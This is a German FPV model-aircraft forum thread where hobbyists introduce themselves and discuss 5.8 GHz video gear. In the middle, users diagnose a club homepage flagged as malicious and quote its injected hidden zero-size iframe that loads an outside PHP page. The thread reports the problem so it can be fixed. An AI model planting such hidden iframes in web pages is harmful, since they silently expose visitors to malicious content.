Ich stell mich vor

PatrickH

Neuer Benutzer
Hi,

Patrick Hoster
Alter: 42
Ich betreibe mein Hobby bereits seit Jahren über Autos, Boote und nun Motorsegler und Scale Heli's (Airwolf). Ich geniesse meine Motorsegler vorallem weil die weniger Nervenaufreibend wie Helikopter sind (und zur Entspannung).
Die ganze FPV Geschichte ist für mich Neuland die ich gerne betreten möchte. Natürlich träumt man als Laie bereits von ausgedehnten Flügen weit über unsere Sender Leistungen. Na ja, vielleicht klappt das mal.

Ich bin dankbar über alle FPV Erfahrungstipps und werde mir in den nächsten Wochen bestimmt ein FPV Kit zulegen. Ich denke, dass wir in unserem Club ebenfalls noch einige Fans davon überzeugen können und freue mich auf die ersten Erfahrungswerte. http://www.mg-nussbaeumli.ch/

Grüsse aus der Schweiz
Patrick
 
Hallo Andreas. würde mir deine Seite ja gerne anschauen aber mein Firefox bzw. auch Google blockieren die Seite weil angeblich Schadsoftware eingebunden ist. überprüfe die Seite doch bitte mal!!!


Gruß


Jack
 

Tu154M

Erfahrener Benutzer
The-BlackJack hat gesagt.:
Hallo Andreas. würde mir deine Seite ja gerne anschauen aber mein Firefox bzw. auch Google blockieren die Seite weil angeblich Schadsoftware eingebunden ist. überprüfe die Seite doch bitte mal!!!


Gruß


Jack
Moin

Stimmt. Ich kriege hier auch eine Meldung. Danach sieht es so aus, als wenn die Seite per Frame oder Link auf eine phishing website linkt. Phishing ist ganz einfach Passwortklau durch die Imitation einer Seite, welche Login verlangt wie z.B. Myspace oder Hotmail. Einfach nirgendwo auf der Seite seine Daten eingeben und alles sollte glattgehen. Eigentlich.

Lg Kevin
 

Tu154M

Erfahrener Benutzer
Freak-_-y hat gesagt.:
Eigentlich sollte ein Admin gleich mal den Link löschen.
Bis er wieder geht.
Nicht jeder hat einen Schutz an.
Die eigentlich gefährliche Seite ist nicht die gelinkte Seite sondern eine andere auf welche durch die gelinkte verlinkt wird. Das kann durch einen Frame, Link oder auch Bild geschehen.

An dieser Stelle wurde die Seite wohl durch einen Frame eingebunden. Da sie nicht sichtbar ist, besteht auch keine Gefahr, dass irgendjemand dort seine Daten eingibt. Ist auch nur auf der Startseite.
 
Hi,

Da werde ich mal den Admin der Seite nach fragen. Es ist die Homepage des Sonar-eV, also echt nichts böses. Wundert mich ein wenig :|

Viele Grüße
Andreas
 
Hi,

Auf der Seite habe ich folgende Info gefunden:
>>>
Hallo SONAR-Mitglieder,

die Nutzer des Firefox Browsers haben seit ein paar Tagen den Hinweis auf eine von Viren attackierte Seite beim Öffnen der SONAR-Homepage. Man kann die Meldung ignorieren oder einen anderen Browser nehmen.Google hat diese Meldung erzeugt. In einem Beitrag war der Text aus Word eingefügt. Word benutzt Skripte. Die werden teilweise von den Virenscannern als Virus identifiziert. Ist nix Schlimmes oder Gefährliches, aber die Suchmaschine schaltet halt sicherheitshalber ab. Gerade über Google laufen ja 99% der Suchanfragen. Von daher blöd für uns wenn wir solche Meldungen bekommen bzw. wenn bei jemand der die Page besucht eine Warnmeldung erscheint.

Das ist jetzt aber behoben und sollte in den nächsten Tagen wieder normal laufen.

Viele Grüße Sascha und Hans-Jürgen
<<<

Keine ahnung warum es bei euch noch hochkommt, wie schon gesagt, ich frage beim Admin nochmal nach.

Viele Grüße
Andreas
 

Tu154M

Erfahrener Benutzer
Das ist eindeutig nicht das Problem. Am Ende der Seite ist ein Frame eingefügt, welcher auf die Seite verlinkt, welche die Meldung erzeugt. Die Adresse ist in HTML Sonderzeichen entschlüsselt. Ist vermutlich dahin gekommen durch Fremdeinfluss.

Der entsprechende Teil des Quelltextes am Ende:
Code:
<iframe src="http://extraspray.com/in.php" width=0 height=0 frameborder=0>
Auch das bitte direkt mal an den Webmaster weiterleiten, wenn du da Kontakte hast. Es kann sein, dass da Jemand Zugriff hatte, der da nicht hingehört.

Lg
Kevin
 

Twinstar-Klaus

Erfahrener Benutzer
:) :)
Und hier bin ich !!!
Baujahr 63 und jetzt in meinen 2. Jahr, der Modellfliegerei !
Mich fasziniert das Thema FPV total :wow:
So das ich gerne damit anfangen möchte.
Ich denke ich werde hier bei euch viele Anregungen finden.

Viele Grüße
Klaus
 

Poschi

Neuer Benutzer
Da ich mich ja noch nicht zu Wort gemeldet habe wollte ich mich hier doch auch mal kurz vorstellen,

eigentlich fliege ich Acrobat Se und bin dabei einen Easy Glider auf Fpv umzubauen, der Easy Glider ist soweit schonmal fertig... Jetz geht es dann nur noch um das System, das Problem ist ich fliege eine T12 mit 2,4 Ghz und an unserer Flugwiese fliege alle nur noch 2,4ghz, also bleibt mir leider nicht viel übrig als auf 1,3 oder 5,8ghz aufzbauen, das Problem welches es mit 1,3ghz gibt ist mir bewusst, nur um eine anständige Reichweite mit 5,8 ghz zu bekommen ist man schnell mal ne Menge Geld los....


Vielleicht habt ihr ja noch ein paar lösungsvorschläge für mich....


Lg Denis
 

Heling

Erfahrener Benutzer
Tu154M hat gesagt.:
...
Der entsprechende Teil des Quelltextes am Ende:
Code:
<iframe src="http://extraspray.com/in.php" width=0 height=0 frameborder=0>
Ich habe das mal entschlüsselt. Es ist ein URL:
"http://extraspray.com/in.hp"
Was immer das ist...zumindest wird es als Fenster in eine Homepage eingebunden.

Micha
 

FPVer

Erfahrener Benutzer
Hallo leute

Mein Name: Alexander Helbing
Alter/Geburtstag 22.06.94

Ich fliege jetzt seit ein paar Jahren Modelle beim LSV Bad Lauterberg
Unser Modellflugplatz liegt auf dem "Butterberg" Oberhalb von Bad Lauterberg
Ich selber komme aus Steina ca. 15 Km von unserem Platz entfernt.
Seit über einem Jahr interessiere ich mich für das Thema FPV
Und habe mich dann schlau gemacht ,anschließend habe ich mir dann ein gutes FPV System zusammengestellt und bestellt.
Das FPV fliegen macht echt fun!!
 

Richie69

Neuer Benutzer
Hallo Leute,


ich möchte mich auch vorstellen.
Bin gebürtiger Rostocker und lebe nun seit 15 Jahren in Hamburg.
Ich interessiere mich für den Flugmodellsport schon seit meiner Jugend, leider bin ich bis jetzt nicht über einige wenige Anfängermodelle hinaus gekommen, mit denen ich einige Wildflüge absolviert habe.
Es liess sich hier im windigen Norden nicht vermeiden, daß die sich regelmässig sehr schnell zerlegt haben.
Konsequenterweise habe ich mir deshalb vor einiger Zeit den AFPD zugelegt, Bruchlandungen lassen sich seit dem leichter verschmerzen.
Es ist auch ein guter Weg, um mal ein Gefühl für das Flugverhalten der unterschiedlichen Modellklassen zu bekommen.
Nun bin ich soweit, daß ich mir wohl bald wieder ein Flugmodell zulege, mal sehen, was es wird. Es sollte aber eins sein, mit dem man auch FPV und Luftaufnahmen machen kann.


Gruß, Richie
 

wildcat

Erfahrener Benutzer
Hallo,

ich ( 48 ) und mein Sohn ( 14 ) sind seit ca. 4 Jahren Flugbegeistert und fliegen im Süden, 50 km südl. von München.
Er fliegt Fläche ( Parkmaster, Acromaster, einige Funjet, Hotliner usw.) und Heli Logo 10 3D , ich auch Helis ( Logo 20 u. 30 ).
Wir haben schon Erfahrungen mit der FlyCamOne² gesammelt, voll in Ordnung und mit der FlyCamOne³ ( wieder zurückgegeben, da das Übertragungsmodul 2,4 Ghz unsere Steuerungen Graupner IFS 2,4 Ghz zu sehr gestört haben ).
Da uns das EPV fasziniert, sind wir nun auf der Suche nach einem funktionierendem System, das uns auf eine Entfernung von ca. 1000 m Störungsfrei EPV ermöglicht. Da wir mit 2,4 Ghz steuern, wird es wohl ein 5,8 Ghz System werden.
Wir hoffen auf eure Unterstützung:).

Gruß
Robert/Adrian
 

Dave

Erfahrener Benutzer
Erst mal Herzlich Willkommen bei der FPV Community! FPV Equipment gibts bei Sebastian! Hat seit neuestem das 5,8 GHz System im Shop! Schau doch dort mal vorbei! http://immersionsflug.de.

Ansonsten findest hier viele sehr nette Leute, die Dir echt weiterhelfen können! Meiner Erfahrung nach zumindest!

Bis bald im Forum!

Dave
 

Jujo

Erfahrener Benutzer
Weis gar nicht ob ich mich schon richtig vorgestellt habe. Aber hab mir ein 5,8ghz FPV Set bestellt. Ich hoffe damit bald in eure Kreise aufsteigen zu können ;-)

Grüße Helmut
 
Hallo an Alle,

kurz zu meiner Person: ich bin jetzt 60 Jahre alt und wohne in Pforzheim. In früheren Jahren habe ich Flächenmodelle mit Verbrennermotor geflogen. Bedingt durch beruflich bedingten Zeitmangel ist das Hobby leider in den Hintergrund getreten.

Durch Zufall bin ich vor einem Jahr an einen Multiplex EasyStar geraten und es hat mich wieder gepackt. Mit dem EasyStar und einer FlyCamOne habe ich auch schon Luftbilder und Videos gemacht.
http://www.youtube.com/watch?v=3LiIft3tn8w
Erstflug mit "Baumlandung" Dauer 1:30 :D

Und weil das Fliegen mit einer Bordkamera ohne FPV nur Glücksache ist möchte ich mich diesem Thema intensiver widmen.

Gruss
Wolfgang
 
FPV1

Banggood

Oben Unten